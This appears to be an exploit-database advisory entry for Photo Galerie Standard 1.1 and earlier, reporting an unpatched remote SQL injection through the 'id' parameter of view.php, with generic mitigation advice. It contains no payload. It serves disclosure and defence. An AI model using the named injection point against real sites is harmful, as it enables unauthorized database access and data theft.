Vendor: Photo Galerie Standard
By: ajann
CVSS: 7.5 (HIGH)
Remote SQL Injection
CWE: 89
Product Name: Photo Galerie Standard
Affected Version From: Photo Galerie Standard <= 1.1
Affected Version To: Photo Galerie Standard <= 1.1
Patch Exists: NO
Related CWE:
CPE: a:noname-media:photo_galerie_standard:1.1
Platforms Tested:
2007
Photo Galerie Standard <= 1.1 (view.php) Remote SQL Injection Vulnerability
Photo Galerie Standard <= 1.1 is vulnerable to remote SQL injection through view.php. By manipulating the 'id' parameter of 'view.php', an attacker can execute arbitrary SQL queries against the underlying database. This can lead to unauthorized access, data theft, and other malicious activities.
Mitigation:
To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, using prepared statements or parameterized queries can help prevent SQL injection attacks.